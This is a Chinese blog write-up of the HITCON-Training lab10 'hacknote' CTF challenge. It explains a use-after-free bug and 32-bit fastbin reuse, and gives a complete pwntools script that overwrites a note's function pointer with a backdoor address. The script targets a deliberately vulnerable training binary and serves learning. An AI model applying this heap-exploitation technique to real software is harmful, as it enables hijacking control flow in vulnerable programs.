HITCON-Training lab10(uaf入门题)

最新推荐文章于 2024-03-12 19:53:22 发布
最新推荐文章于 2024-03-12 19:53:22 发布
阅读量725 收藏 4
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43935969/article/details/104730157
版权

题目下载地址:https://github.com/scwuaptx/HITCON-Training

哈哈哈,纪念一下明白的第一道堆题,虽然它真的很简单。。。

 

32位程序

 

三个功能,增、删、打印

 

程序给我们预留了后门函数

 

add函数,创建note会有两个堆块,分别是存放两个函数指针的8字节堆块和存放内容的堆块

这个示意图很清楚:

 

delete函数

 

print函数

 

因为存在uaf漏洞,又有后门函数,所以考虑,将后门函数地址写入context,让该context覆盖8字节print_note_content的地址

再打印该chunk的时候,函数指针会指向这块区域,从而执行后门函数

 

了解一下fastbin(64位)

fastbin所包含chunk的大小为16 Bytes, 24 Bytes, 32 Bytes, … , 80 Bytes。当分配一块较小的内存(mem<=64 Bytes)时,会首先检查对应大小的fastbin中是否包含未被使用的chunk,如果存在则直接将其从fastbin中移除并返回;否则通过其他方式(剪切top chunk)得到一块符合大小要求的chunk并返回。

而当free一块chunk时,也会首先检查其大小是否落在fastbin的范围中。如果是,则将其插入对应的bin中。顾名思义,fastbin为了快速分配回收这些较小size的chunk,并没对之前提到的bk进行操作,即仅仅通过fd组成了单链表而非双向链表,而且其遵循后进先出(LIFO)的原则。

类似于0 day这本书的块表

因为程序是32位的,所以fastbin中块的大小为8Bytes, 12Bytes, 16Bytes, … , 40Bytes

我们的函数指针是8字节的,所以,如果我们先分配两个快,他们的大小不等于8字节,那么,free掉这两个块的时候,fastbin中的情况

8字节的 --> chunk1指针 --> chunk0指针 --> tail

n(<40字节)--> chunk1 --> chunk0 -->tail

 

那么,我们malloc的时候,size选择0x8,add函数中先分配指针的堆块,然后分配content的堆块

1.8字节的 --> chunk0 -->tail

chunk2指针=chunk1指针

chunk2_content=chunk0指针

所以,在打印chunk0的时候,chunk0的函数指针会指向chunk2的content,如果之前传入了后门函数magic,就可以顺利执行了

#coding=utf-8
from pwn import *
p=process('./hacknote')

magic_addr=0x08048986

def add(size,content):
    p.recvuntil("Your choice :")
    p.sendline('1')
    p.recvuntil("Note size :")
    p.sendline(str(size))
    p.recvuntil("Content :")
    p.sendline(content)

def delete(index):
    p.recvuntil("Your choice :")
    p.sendline('2')
    p.recvuntil("Index :")
    p.sendline(str(index))

def print_note(index):
    p.recvuntil("Your choice :")
    p.sendline('3')
    p.recvuntil("Index :")
    p.sendline(str(index))

add(0x32,'aaaa')#0
add(0x32,'aaaa')#1
delete(0)
delete(1)
add(0x8,p32(magic_addr))#2
print_note(0)
p.interactive()

在本地/home/hacknote下创建了flag文件

执行结果:

参考博客:https://www.jianshu.com/p/f894c2961ca6

 

 

 

 

 

 

书文的学习记录本
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
HITCON-training lab10 wp
qq_43409582的博客
01-30 1651
0x00 开始利用的学习了,先做第一入门目,UAF漏洞利用。 0x01 看保护: 一个32位的开了canary和nx保护 0x02 ida分析 一个菜单有加、减、查看功能 看add是什么样子 1-2 .先会malloc一个8字节的空间,指向print_note_content函数,用来打印content。 3-4 .再malloc一个size用来存放你写入的content 再看看del_n...
hitcontraining_playfmt
qq_62887641的博客
09-14 85
32位保护全关存在格式化字符串漏洞,并且是bss段,也就是非栈上的格式化字符串。
hitcontraining_uaf
z1r0的博客
12-10 1519
hitcontraining_uaf 查看保护 有uaf,还有后门函数 这里会将show的功能存放在里,没有pie所以思路就是将print_note_content这个功能改成magic就可以了,改完show一下就可以执行magic。 申请两个0x10, 释放掉,有uaf,没有清0。 这时再申请一个0x8的,因为fastbin,填充content时其实就改的是print_note_content。 content放入magic即可。 from pwn import * context(arc
我的安全之路——二进制与逆向篇
热门推荐
giantbranch的专栏
07-23 2万+
我的安全之路——二进制与逆向篇write in my dormitory at ‏‎11:23:35 Saturday, May 20th, 2017 by giantbranch(一个当初想横跨web跟二进制的菜鸡)​ ————致即将毕业的自己。​ 上一篇是《我的安全之路——Web安全篇》,,因为参加比赛,搞论文,就没什么时间写了,今天刚好答完辩,终于有时
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
HITCON-ZeroDay年度报告.pdf
08-28
HITCON-ZeroDay年度报告》是一份由台湾黑客协会HITCON组织发布的年度安全研究报告,重点关注了安全研究、安全开发以及渗透测试等领域。该报告的发布旨在促进安全专家与企业之间的沟通与合作,共同营造一个良好的...
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有目整理...............................................................................................................................................................................
HitCon-2015-spartan-0day-exploit:HitCon 2015斯巴达人0day&exploit
05-12
HitCon-2015-spartan-0day-exploit 1、IsolationHeap 2、MemoryProtection 3、Spartan Memory Manage(MemGC) 4、CFG 5、Exploit Bypass All 6、0day 因为与微软的协议,所以PPT中的bypass CFG和0day漏洞的详细细节...
use after free HITCON-training (lab 10 hacknote)
九层台
08-06 848
liu@liu-F117-F:~/1t/u18/文档/溢出学习/use after free$ checksec hacknote [*] '/home/liu/1t/u18/\xe6\x96\x87\xe6\xa1\xa3/\xe5\xa0\x86\xe6\xba\xa2\xe5\x87\xba\xe5\xad\xa6\xe4\xb9\xa0/use after free/hacknote' ...
HITCON-training lab 10 hacknote
coco的博客
11-19 699
基本信息 首先,我们通过checksec来查看程序的基本信息和开启的防护。该程序是一个32位程序,并且开启了canary和nx。 运行程序之后发现是一个菜单类型的程序。 静态分析 add note函数 首先申请了一个8字节的chunk,其指针记录在bss段上。这个8字节的内容是一个结构体 struct node { 指向print note content函数的指针 指向content的指针...
HITCON2022--ctf驱动逆向
m0_64973256的博客
12-28 958
当用户传入0x222080的时候,驱动进入这个分支,如果数组byte_140013190里的8个值均为1,则会跳转到LABEL_21,很显然,这里验证的内容是dword_140003000的开头是否是hitcon,这说明这里会出现flag。于是经过一番倒腾测试,发现执行一个函数,只有最后一个函数能执行下去,能行,一定是顺序问,经过又一番测试,得到最终测试顺序,这大概是某种保护手段,阻碍静态分析,真正的函数是运行中动态生成的(实测,异或这两轮的结果并不是可执行的代码)
uaf漏洞例
最新发布
2302_79899078的博客
03-12 533
这里我们要注意由于系统不会直接回收内存空间,并且free后并没有将指针置0,create函数创建的chunk是不能自定义的,但是我们只要free后再申请一次,它就会把之前的chunk给我们复用。总结:以现在博🐖接触到的uaf来说,困难的不是原理,利用思路,难点在于代码的审计,毕竟博🐖学爪洼。,申请size时代码构造有困难,总的来说就到这里了。代码审计:只能说五脏俱全 ,add,del,free全都有,典中点,宣~~~本文并不是详细讲解uaf漏洞及double free利用的,只是实操。
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1635
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
hitcontraining_bamboobox
像初雪一样自由洒落
04-24 703
hitcontraining_bamboobox这道有两种解方式: house of force 参考:house of force unlink house of force(详解) 知识点 只要top chunk size够大,就能随意申请chunk 所以,如果有溢出能控制top chunk size,就可以修改其为-1(0xffffffff最大值),然后malloc(负数)可以向上申请,malloc(正数) 目流程 程序一开始申请0x10的块,存放hello_message和.
HITCON-Training lab7(一道简单的格式化字符串读漏洞)
像初雪一样自由洒落
03-27 258
格式化字符串知道他的操作,可是做的一点也不熟练吧,,,BJDCTF上的r2t4不会啊,,,看不懂,,,所以就来补补格式化字符串的目了,,,, 看到canary开启了,我还以为要泄漏canary呢,结果发现不用那么麻烦,,, 其实看下,思路很清晰,先让你输入东西,然后返回给你,然后你输入password,如果和程序中的一样,你就拿到flag了,, 所以输入的东西里面需要泄漏pa...
CTF pwn普通UAF目模板
半岛铁盒的博客
06-15 485
from pwn import * context(log_level=‘debug’) elf=ELF(’./) r=remote("","") #r=process(’./’) def create(size,content): r.sendlineafter("Your choice: ",‘1’) r.sendlineafter("Please input size: ",str(size)) r.sendafter("Please input content: ",content) def del
HITCON-trainning&寒假做记录
Peanuts
01-28 659
HITCON-trainning 2019.1.27 是一些好目这几天准备重新做一遍预计两天之内完成现在做到lab7 目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
[hitcon 2017]ssrfme 1
04-11
这道目是一个SSRF漏洞目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理...此的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

书文的学习记录本

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值